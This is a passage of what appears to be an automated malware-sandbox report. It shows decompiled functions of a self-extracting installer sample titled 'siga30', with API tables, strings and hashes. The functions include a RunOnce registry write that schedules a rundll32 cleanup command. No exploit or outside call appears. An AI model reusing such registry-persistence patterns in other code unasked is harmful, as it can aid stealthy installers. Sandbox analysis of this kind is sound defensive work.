				return E00076CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00072cb5
0x00072cbc
0x00072cc7
0x00072cc9
0x00072cd1
0x00072cd3
0x00072cd9
0x00072ce9
0x00072cf9
0x00072d0e
0x00072d15
0x00072d1c
0x00072ef3
0x00000000
0x00072d2d
0x00072d34
0x00072d3b
0x00072d40
0x00072d48
0x00072d59
0x00072d84
0x00072e1f
0x00072e1f
0x00072e2e
0x00072e41
0x00072e5a
0x00072e62
0x00072e6c
0x00072e6c
0x00072e75
0x00072e77
0x00072e77
0x00072e84
0x00072e8b
0x00072e94
0x00000000
0x00072e96
0x00072e96
0x00072e9e
0x00072ea2
0x00072eba
0x00000000
0x00072ece
0x00072ede
0x00072eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00072eed
0x00072eef
0x00072eef
0x00072eef
0x00072eef
0x00072ea2
0x00072e86
0x00072e88
0x00072e88
0x00072e43
0x00072e48
0x00000000
0x00072e48
0x00072e30
0x00072e30
0x00072ef8
0x00072f01
0x00000000
0x00072f01
0x00072d8a
0x00072d8f
0x00072da1
0x00000000
0x00072da3
0x00072dae
0x00072db4
0x00072dbb
0x00000000
0x00072dca
0x00072dd3
0x00072df5
0x00072e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00072dd5
0x00072dde
0x00072de3
0x00072e04
0x00072e0a
0x00072e10
0x00000000
0x00072e10
0x00072dd3
0x00072dbb
0x00072da1
0x00072d5b
0x00072d5b
0x00072d5d
0x00072d69
0x00072d6e
0x00072f06
0x00072f06
0x00072f06
0x00072d59
0x00072f18

APIs

memset.MSVCRT ref: 00072CD9
memset.MSVCRT ref: 00072CE9
memset.MSVCRT ref: 00072CF9

Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
Part of subcall function 0007468F: SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
Part of subcall function 0007468F: LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
Part of subcall function 0007468F: LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
Part of subcall function 0007468F: memcpy_s.MSVCRT ref: 000746E5
Part of subcall function 0007468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00072D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00072D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00072DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00072DBD
CloseHandle.KERNEL32(siga30,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00072E0A

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 00074554

Strings

TITLE, xrefs: 00072D09
INSTANCECHECK, xrefs: 00072D95
VERCHECK, xrefs: 00072E54
EXTRACTOPT, xrefs: 00072D4D
siga30, xrefs: 00072D04, 00072DD9, 00072DF0

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$siga30
API String ID: 1002816675-2759441779
Opcode ID: a5f9e72b8855c00f080adcc707905aeddf6bb02304cfce2fb88ee6f12fa546f2
Instruction ID: bf8c8eeab41b6ca2bd4a6369cc46c3b46a86eae97df5de37332a809d69341150
Opcode Fuzzy Hash: a5f9e72b8855c00f080adcc707905aeddf6bb02304cfce2fb88ee6f12fa546f2
Instruction Fuzzy Hash: 4D51B370F403016AF7A0A7249C4ABBA26D8EB85700F40C439FA4DE51D2DBBC8891C76E

Uniqueness

Uniqueness Score: -1.00%

Function 000734F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E000734F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x791d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x78584 = _t35;
					E000743D0(_t35, GetDesktopWindow());
					__eflags =  *0x78184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "siga30");
					_t17 = CreateThread(0, 0, E00074FE0, 0, 0, 0x78798);
					 *0x7879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E000744B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x7858c);
					_t38 =  *0x78584; // 0x0
					_t25 = E000744B9(_t38, 0x4b2, 0x71140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x791d8 = 1;
						SetEvent( *0x7858c);
						_t39 =  *0x7879c; // 0x0
						E00073680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x7858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x7879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x000734fb
0x000734fe
0x00073665
0x00073666
0x00073666
0x00073668
0x0007366e
0x0007366e
0x00073671
0x00073671
0x00073677
0x00000000
0x00073677
0x00073504
0x00073506
0x00073507
0x0007350c
0x0007365b
0x0007365f
0x00000000
0x00000000
0x00000000
0x00073661
0x00073512
0x00073515
0x000735be
0x000735c1
0x000735d1
0x000735d8
0x000735de
0x000735f8
0x00073617
0x00073617
0x00073623
0x00073637
0x0007363d
0x00073642
0x00073644
0x00000000
0x00073646
0x00073652
0x00073657
0x00073658
0x00000000
0x00073658
0x00073644
0x0007351b
0x0007351d
0x0007354f
0x00073553
0x00000000
0x00000000
0x0007355f
0x00073565
0x0007357c
0x00073581
0x00073584
0x0007359b
0x000735a1
0x000735a7
0x000735ad
0x000735b3
0x000735b8
0x00000000
0x000735b8
0x00073586
0x00073588
0x00000000
0x00000000
0x00073590
0x00000000
0x00073590
0x00073524
0x00073535
0x00073541
0x00000000
0x00073549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00073535
EndDialog.USER32(?,?), ref: 00073541
ResetEvent.KERNEL32 ref: 0007355F
SetEvent.KERNEL32(00071140,00000000,00000020,00000004), ref: 00073590
GetDesktopWindow.USER32 ref: 000735C7
GetDlgItem.USER32(?,0000083B), ref: 000735F1
SendMessageA.USER32(00000000), ref: 000735F8
GetDlgItem.USER32(?,0000083B), ref: 00073610
SendMessageA.USER32(00000000), ref: 00073617
SetWindowTextA.USER32(?,siga30), ref: 00073623
CreateThread.KERNEL32 ref: 00073637
EndDialog.USER32(?,00000000), ref: 00073671

Strings

siga30, xrefs: 0007361D

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: siga30
API String ID: 2406144884-2499866817
Opcode ID: 359e4038ea1035eba81fdbb1d905e215d52df0f87500b06723e5ff9f71857f79
Instruction ID: b1d103859cdf4ba026f1119884b41899fb2238c178f2d93c5a0600a0ed343aab
Opcode Fuzzy Hash: 359e4038ea1035eba81fdbb1d905e215d52df0f87500b06723e5ff9f71857f79
Instruction Fuzzy Hash: 46319271F44300BBF7601B25AC4DE6F3AA8E7C6B11F50C525F60EA52A1CA7D8980EB59

Uniqueness

Uniqueness Score: -1.00%

Function 00074224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00074224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E000744B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x788c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x787a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x78598;
					_v36 = 1;
					_v32 = E00074200;
					_v28 = 0x788c0;
					 *0x7a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x7a288(_t32, 0x788c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x788c0 != 0) {
							E00071680(0x787a0, 0x104, 0x788c0);
						}
						 *0x7a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x787a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x788c0);
					_t61 = 0x788c0;
					_t4 =  &(_t61[1]); // 0x788c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x788c0; // 0xf1181
					_t44 = CharPrevA(0x788c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x788c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00074234
0x0007423c
0x00074240
0x000743b2
0x000743b7
0x000743c0
0x00000000
0x000743c5
0x0007424c
0x00074252
0x00074257
0x000743a4
0x000743a5
0x000743ab
0x00000000
0x000743ab
0x00074263
0x00074269
0x0007426e
0x00000000
0x00000000
0x0007427a
0x00074280
0x00074285
0x00000000
0x00000000
0x0007428d
0x00074293
0x000742e6
0x000742e9
0x000742ef
0x000742f4
0x000742f7
0x00074300
0x00074307
0x0007430e
0x00074315
0x0007431c
0x00074322
0x00074326
0x0007432d
0x0007432d
0x0007432f
0x00074334
0x00074343
0x00074349
0x0007434d
0x00074354
0x00074354
0x0007435d
0x0007436e
0x0007436e
0x0007437d
0x00074383
0x00074387
0x0007438e
0x0007438e
0x00074387
0x00074391
0x00074399
0x00000000
0x00074295
0x0007429f
0x000742a5
0x000742aa
0x000742aa
0x000742ad
0x000742ad
0x000742af
0x000742b0
0x000742b6
0x000742c2
0x000742c8
0x000742ce
0x000742e4
0x000742e4
0x00000000
0x000742ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00074236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0007424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00074263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0007427A
GetTempPathA.KERNEL32(00000104,000788C0,?,00000001), ref: 0007429F
CharPrevA.USER32(000788C0,000F1181,?,00000001), ref: 000742C2
CharPrevA.USER32(000788C0,00000000,?,00000001), ref: 000742D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00074391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 000743A5

Strings

SHELL32.DLL, xrefs: 0007422F
SHBrowseForFolder, xrefs: 00074246
SHGetPathFromIDList, xrefs: 00074274

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: ce2f1c75b1c01f852ccee7ade188c9e14cb790a809b95c4ca1eb6359de8a8113
Instruction ID: 40020bea1a6ef6b6008a9606bdc7bf8254fcffd9a4130ccf691812e2e710cf16
Opcode Fuzzy Hash: ce2f1c75b1c01f852ccee7ade188c9e14cb790a809b95c4ca1eb6359de8a8113
Instruction Fuzzy Hash: D4410474E40200AFE751AB74DC88AAE7BB4EB45344F44C4A9E94DA7252CF7C8D41C77A

Uniqueness

Uniqueness Score: -1.00%

Function 00072773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00072773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x78004; // 0xa87cf02e
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00071781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0007658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0007658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x71140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00071680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00076CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00072773
0x0007277e
0x00072785
0x0007278a
0x0007278d
0x00072790
0x00072792
0x00072798
0x0007279d
0x000728b2
0x00000000
0x000727a3
0x000727a3
0x000727af
0x000727c2
0x000727c8
0x000727cd
0x000727d5
0x000728b7
0x000728b9
0x00000000
0x000727db
0x000727dd
0x000728aa
0x00000000
0x000727e3
0x000727e3
0x000727ec
0x000727f8
0x00072803
0x0007280b
0x00072831
0x000728c3
0x000728c9
0x000728cd
0x00072837
0x0007285a
0x0007285c
0x00072865
0x00072892
0x00072895
0x00000000
0x00000000
0x00072867
0x00072878
0x0007288c
0x00000000
0x0007287a
0x00072880
0x00072885
0x00072897
0x00072899
0x00072899
0x00072878
0x00072865
0x000728a0
0x000728bf
0x000728c1
0x00000000
0x00000000
0x000728c1
0x00072831
0x000727dd
0x000727d5
0x000728e5

APIs

CharUpperA.USER32(A87CF02E,00000000,00000000,00000000), ref: 000727A8
CharNextA.USER32(0000054D), ref: 000727B5
CharNextA.USER32(00000000), ref: 000727BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00072829
RegQueryValueExA.ADVAPI32(?,00071140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00072852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00072870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000728A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 000728AA
GetSystemDirectoryA.KERNEL32 ref: 000728B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 000727E4

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 81a1cc4f7426cefd05a87f31670e4647233ffff54fccaf5d3c281b33c7c927db
Instruction ID: c44062967b9ee685345b3997ac08eb0bfb0b79540a14573451a7276f64eae766
Opcode Fuzzy Hash: 81a1cc4f7426cefd05a87f31670e4647233ffff54fccaf5d3c281b33c7c927db
Instruction Fuzzy Hash: 8241B270E00128ABEB649B649C85AFE77BCEB55700F0084A9F54DE2141CB7D9EC58FA6

Uniqueness

Uniqueness Score: -1.00%

Function 00072267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00072267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x78004; // 0xa87cf02e
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x78530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0007658A( &_v268, 0x104, 0x71140);
							}
							_push("C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
							E0007171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00076CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x00072272
0x00072277
0x00072279
0x00072283
0x00072289
0x000722ab
0x000722b1
0x000722c4
0x000722e0
0x000722e6
0x000722f5
0x0007230d
0x0007231c
0x0007231c
0x00072321
0x0007233a
0x00072342
0x00072348
0x0007234b
0x0007234c
0x0007234c
0x0007234e
0x0007234f
0x0007236e
0x0007236e
0x0007237a
0x00072380
0x00072380
0x00072381
0x00072381
0x0007238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 000722A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 000722D8
memset.MSVCRT ref: 000722F5
GetSystemDirectoryA.KERNEL32 ref: 00072305
RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0007236E
RegCloseKey.ADVAPI32(?), ref: 0007237A

Strings

wextract_cleanup1, xrefs: 0007227C, 000722CD, 00072363
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00072321
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0007232D
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00072299

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
API String ID: 3027380567-2836157002
Opcode ID: d69d1f8138aea6c22a30ce9f06ac3db389141249772c0d33e848e40670e703ce
Instruction ID: c263c8e893a3c2e83bf4fd0a1aaf27ba71d3bfd10897622518c386a977a05c3e
Opcode Fuzzy Hash: d69d1f8138aea6c22a30ce9f06ac3db389141249772c0d33e848e40670e703ce
Instruction Fuzzy Hash: AF31C871E002186BDB619B50DC49FEA777CEB55740F0041A9B50DAA051DA7D6B88CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00073100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00073100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x78590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x78590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E000743D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x78d4c);
					SetWindowTextA(_t33, "siga30");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x788b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E000730C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00073108
0x0007310b
0x000731b7
0x000731ca
0x000731d0
0x000731d0
0x000731da
0x00000000
0x000731da
0x00073111
0x00073114
0x00073136
0x00073136
0x00073138
0x0007313b
0x00073141
0x00000000
0x00073143
0x00073116
0x0007311b
0x0007314b
0x00073151
0x00073158
0x0007316a
0x00073176
0x0007317d
0x0007318b
0x0007319e
0x000731a3
0x00000000
0x000731ad
0x00073120
0x00000000
0x00000000
0x0007312a
0x00073134
0x00000000
0x00000000
0x00000000
0x00073134
0x0007312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 0007313B
GetDesktopWindow.USER32 ref: 0007314B
SetDlgItemTextA.USER32(?,00000834), ref: 0007316A
SetWindowTextA.USER32(?,siga30), ref: 00073176
SetForegroundWindow.USER32(?), ref: 0007317D
GetDlgItem.USER32(?,00000834), ref: 00073185
GetWindowLongA.USER32(00000000,000000FC), ref: 00073190
SetWindowLongA.USER32(00000000,000000FC,000730C0), ref: 000731A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 000731CA

Strings

siga30, xrefs: 00073170

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: siga30
API String ID: 3785188418-2499866817
Opcode ID: 803bf4e85ad469356089aa388c7657a1f71d735b508670b3533c97038f774ae7
Instruction ID: de2ae8add16dcc08c7a47eae69d153ca9e8559e54806cc6c6135159fc7eb91d9
Opcode Fuzzy Hash: 803bf4e85ad469356089aa388c7657a1f71d735b508670b3533c97038f774ae7
Instruction Fuzzy Hash: D811D231F44211BBFB205B249C0CB9E3BA4EB87721F508210F81DA51E0DB7C9681E79A

Uniqueness

Uniqueness Score: -1.00%

Function 000718A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E000718A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x78004; // 0xa87cf02e
